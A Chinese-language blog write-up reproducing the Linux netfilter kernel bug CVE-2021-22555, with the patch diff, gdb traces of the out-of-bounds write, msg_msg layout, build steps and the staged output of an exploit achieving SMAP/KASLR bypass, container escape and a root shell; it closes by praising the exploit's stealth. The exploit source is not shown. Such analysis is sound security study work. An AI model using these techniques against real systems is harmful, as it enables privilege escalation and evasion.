内核提权CVE-2021-22555复现分析

2025/04/26 kernel-exploit 共 8638 字,约 25 分钟

CVE-2021-22555到2021年修复时,已经存在了15年,是netfilter模块一个越界写(OOB - out-of-bounds write) 。问题出现在x64内核上加载x86格式的xt table消息时,padding的差异引起了越界写。问题在v2.6.19-rc1(9fa492cdc160cd27ce1046cb36f47d3b2b1efa21)引入,在 2021.4 commit b29c457a6511435960115c0f548c4360d5f4801d修复。

漏洞原理

diff --git a/net/netfilter/x_tables.c b/net/netfilter/x_tables.c
index 6bd31a7a27fc..92e9d4ebc5e8 100644
--- a/net/netfilter/x_tables.c
+++ b/net/netfilter/x_tables.c
@@ -733,7 +733,7 @@ void xt_compat_match_from_user(struct xt_entry_match *m, void **dstptr,
 {
        const struct xt_match *match = m->u.kernel.match;
        struct compat_xt_entry_match *cm = (struct compat_xt_entry_match *)m;
-       int pad, off = xt_compat_match_offset(match);
+       int off = xt_compat_match_offset(match);
        u_int16_t msize = cm->u.user.match_size;
        char name[sizeof(m->u.user.name)];

@@ -743,9 +743,6 @@ void xt_compat_match_from_user(struct xt_entry_match *m, void **dstptr,
                match->compat_from_user(m->data, cm->data);
        else
                memcpy(m->data, cm->data, msize - sizeof(*cm));
-       pad = XT_ALIGN(match->matchsize) - match->matchsize;
-       if (pad > 0)
-               memset(m->data + match->matchsize, 0, pad);

        msize += off;
        m->u.user.match_size = msize;
@@ -1116,7 +1113,7 @@ void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
 {
        const struct xt_target *target = t->u.kernel.target;
        struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
-       int pad, off = xt_compat_target_offset(target);
+       int off = xt_compat_target_offset(target);
        u_int16_t tsize = ct->u.user.target_size;
        char name[sizeof(t->u.user.name)];

@@ -1126,9 +1123,6 @@ void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
                target->compat_from_user(t->data, ct->data);
        else
                memcpy(t->data, ct->data, tsize - sizeof(*ct));
-       pad = XT_ALIGN(target->targetsize) - target->targetsize;
-       if (pad > 0)
-               memset(t->data + target->targetsize, 0, pad);

        tsize += off;

vul: __sys_setsockopt(fd, level, optname, optval, optlen); nf_setsockopt do_ipt_set_ctl

OOB触发后后面页会有两个字节被设置成0:


(gdb) list
1126                    memcpy(t->data, ct->data, tsize - sizeof(*ct));
1127            pad = XT_ALIGN(target->targetsize) - target->targetsize;
1128            if (pad > 0)
1129                    memset(t->data + target->targetsize, 0, pad);
1130
1131            tsize += off;
1132            t->u.user.target_size = tsize;
1133            strlcpy(name, target->name, sizeof(name));
1134            module_put(target->me);
1135            strncpy(t->u.user.name, name, sizeof(t->u.user.name));
(gdb) p t
$104 = (struct xt_entry_target *) 0xffff888108c9afda
(gdb) p t->data
$105 = 0xffff888108c9affa ""
(gdb) x/a t->data
0xffff888108c9affa:     0x0 <fixed_percpu_data>
(gdb) p *t
$106 = {u = {user = {target_size = 32, name = "NFQUEU\240\2264\203\377\377\377\377", '\000' <repeats 14 times>, revision = 1 '\001'}, kernel = {target_size = 32,
      target = 0xffffffff833496a0 <nfqueue_tg_reg+128>}, target_size = 32}, data = 0xffff888108c9affa ""}
(gdb) p/x t
$107 = 0xffff888108c9afda
(gdb) p target->targetsize
$108 = 4
(gdb) p/x 0xffff888108c9affa + 4
$109 = 0xffff888108c9affe

(gdb) x/20a 0xffff888108c9affe + 2
0xffff888108c9b000:     0xffff888108f82000      0xffff8881023f64c0
0xffff888108c9b010:     0x41    0xfd0

(gdb)x/20a 0xffff888108c9affe + 2
0xffff888108c9b000:     0xffff888108f80000      0xffff8881023f64c0
0xffff888108c9b010:     0x41    0xfd0

stack:
(gdb) bt
#0  xt_compat_target_from_user (t=0xffff888108c9afda, dstptr=dstptr@entry=0xffffc90000ae3ac8, size=size@entry=0xffffc90000ae3ac4) at net/netfilter/x_tables.c:1131
#1  0xffffffff81f77bbb in compat_copy_entry_from_user (base=<optimized out>, newinfo=<error reading variable: Cannot access memory at address 0x0>, size=0xffffc90000ae3ac4,
    dstptr=0xffffc90000ae3ac8, e=0xffff888108c99040) at net/ipv4/netfilter/ip_tables.c:1376
#2  translate_compat_table (net=net@entry=0xffff8881053f33c0, pinfo=pinfo@entry=0xffffc90000ae3b80, pentry0=pentry0@entry=0xffffc90000ae3b88, compatr=compatr@entry=0xffffc90000ae3b94)
    at net/ipv4/netfilter/ip_tables.c:1440
#3  0xffffffff81f78974 in compat_do_replace (net=net@entry=0xffff8881053f33c0, arg=..., len=4114) at net/ipv4/netfilter/ip_tables.c:1517
#4  0xffffffff81f78d4d in do_ipt_set_ctl (sk=<optimized out>, cmd=64, arg=..., len=4114) at net/ipv4/netfilter/ip_tables.c:1624
#5  0xffffffff81e1c64a in nf_setsockopt (sk=sk@entry=0xffff888105c31a40, pf=pf@entry=2 '\002', val=val@entry=64, opt=..., len=len@entry=4114) at net/netfilter/nf_sockopt.c:101
#6  0xffffffff81efd387 in ip_setsockopt (sk=0xffff888105c31a40, level=<optimized out>, optname=64, optval=..., optlen=4114) at net/ipv4/ip_sockglue.c:1435
#7  0xffffffff81f0a564 in tcp_setsockopt (sk=0xffff888105c31a40, level=<optimized out>, optname=64, optval=..., optlen=<optimized out>) at net/ipv4/tcp.c:3598
#8  0xffffffff81d17a6a in sock_common_setsockopt (sock=<optimized out>, level=<optimized out>, optname=<optimized out>, optval=..., optlen=<optimized out>) at net/core/sock.c:3249
#9  0xffffffff81d15e64 in __sys_setsockopt (fd=<optimized out>, level=<optimized out>, optname=<optimized out>, user_optval=0xffb44c0a "", optlen=<optimized out>) at net/socket.c:2115
#10 0xffffffff81d98631 in __do_compat_sys_socketcall (args=0xffb44ba8, call=14) at net/compat.c:492
#11 __se_compat_sys_socketcall (args=<optimized out>, call=14) at net/compat.c:424
#12 __ia32_compat_sys_socketcall (regs=<optimized out>) at net/compat.c:424
#13 0xffffffff821710e2 in do_syscall_32_irqs_on (nr=<optimized out>, regs=0xffffc90000ae3f58) at arch/x86/entry/common.c:77
#14 __do_fast_syscall_32 (regs=regs@entry=0xffffc90000ae3f58) at arch/x86/entry/common.c:139
#15 0xffffffff821711f4 in do_fast_syscall_32 (regs=0xffffc90000ae3f58) at arch/x86/entry/common.c:164
#16 0xffffffff8217124f in do_SYSENTER_32 (regs=<optimized out>) at arch/x86/entry/common.c:207
#17 0xffffffff8220164a in entry_SYSENTER_compat () at arch/x86/entry/entry_64_compat.S:139
#18 0x0000000000000000 in ?? ()

利用主要借助message queue:

MSGOP(2)                                                                          System Calls Manual                                                                         MSGOP(2)

NAME
       msgrcv, msgsnd - System V message queue operations

LIBRARY
       Standard C library (libc, -lc)

SYNOPSIS
       #include <sys/msg.h>

       int msgsnd(int msqid, const void msgp[.msgsz], size_t msgsz,
                      int msgflg);

       ssize_t msgrcv(int msqid, void msgp[.msgsz], size_t msgsz, long msgtyp,
                      int msgflg);

DESCRIPTION
       The  msgsnd()  and  msgrcv() system calls are used to send messages to, and receive messages from, a System V message queue.  The calling process must have write permission on
       the message queue in order to send a message, and read permission to receive a message.

       The msgp argument is a pointer to a caller-defined structure of the following general form:

           struct msgbuf {
               long mtype;       /* message type, must be > 0 */
               char mtext[1];    /* message data */
           };

       The mtext field is an array (or other structure) whose size is specified by msgsz, a nonnegative integer value.  Messages of zero length (i.e., no mtext field) are  permitted.
       The mtype field must have a strictly positive integer value.  This value can be used by the receiving process for message selection (see the description of msgrcv() below).

message queue 在内核中的主要结构是 struct msg_msg:

/* offset      |    size */  type = struct msg_msg {
/*      0      |      16 */    struct list_head {
/*      0      |       8 */        struct list_head *next;
/*      8      |       8 */        struct list_head *prev;

                                   /* total size (bytes):   16 */
                               } m_list;
/*     16      |       8 */    long m_type;
/*     24      |       8 */    size_t m_ts;
/*     32      |       8 */    struct msg_msgseg *next;
/*     40      |       8 */    void *security;

                               /* total size (bytes):   48 */
                             }

同一个queue的不同类型m_type的message组成一个双向链表,由m_list串起来。从上面内存分布可以看出,message的第一个元素是next指针。

主要的利用思路:

  • 构造

kernel config

make defconfig
make kvm_guest.config

修改CONFIG_USER_NS=y KROP中使用了rbp恢复原始的调用栈,需要 CONFIG_FRAME_POINTER=y

msgsnd() -> alloc_msg 最大分配4K,数据第一片最大 4K - 0x30,后续都是最大4K - 8;

#define DATALEN_MSG	((size_t)PAGE_SIZE-sizeof(struct msg_msg))
#define DATALEN_SEG	((size_t)PAGE_SIZE-sizeof(struct msg_msgseg))

编译: 安装 sudo apt install gcc-multilib -> gcc -m32 -static -o poc exploit.c

done:

[+] STAGE 0: Initialization
[  100.821096] IPVS: ftp: loaded support on port[0] = 21
[*] Initializing sockets and message queues...
[*] Initialize done sockets and message queues: 3

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...s: 3
[*] Searching for corrupted primary message...
[+] fake_idx: ffa
[+] real_idx: fda

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] primary message kheap_addr: ffff888110091000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] Got secondary message (current UAF buf) kheap_addr: ffff888109000000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffff829d66c0
[+] kbase_addr: ffffffff81000000
[*] Leaking and freeing pipe_buffer object...

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@wintermute:/#

总结

从2.6开始已经存在了很多年。本次复现采用的技术中,利用了RBP恢复利用前的调用栈。

整个利用过程相当于在正常执行流中悄悄执行了几个函数,然后又恢复了正常的流程。

这几个额外调用的函数,完成了权限提升,容器逃逸。

利用过程没有任何新的进程产生,没有任何新的文件产生,也没有文件修改,也没有新连接。

仅仅是切换了权限和进程空间!

利用完美,非常隐蔽。

文档信息

Search

    Table of Contents